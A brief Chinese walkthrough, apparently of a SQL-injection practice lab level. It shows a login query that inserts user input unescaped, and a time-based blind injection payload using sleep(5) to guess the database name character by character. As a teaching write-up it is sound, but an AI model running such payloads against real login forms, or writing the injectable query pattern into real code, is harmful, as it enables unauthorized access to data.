本关没有错误提示,那么我们只能靠猜测进行注入。这里我直接从源代码中看到了sql语句
@$sql="SELECT username, password FROM users WHERE username=‘$uname‘ and password=‘$passwd‘ LIMIT 0,1";
那这里对id进行 ‘ id‘ 的处理。
本关我们利用延时注入进行。
猜测数据库名第一位:
uname=admin‘and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit
正确的时候可以直接登录,不正确的时候延时5秒。
其他的payload自行构造。
原文:http://www.cnblogs.com/lcamry/p/5763053.html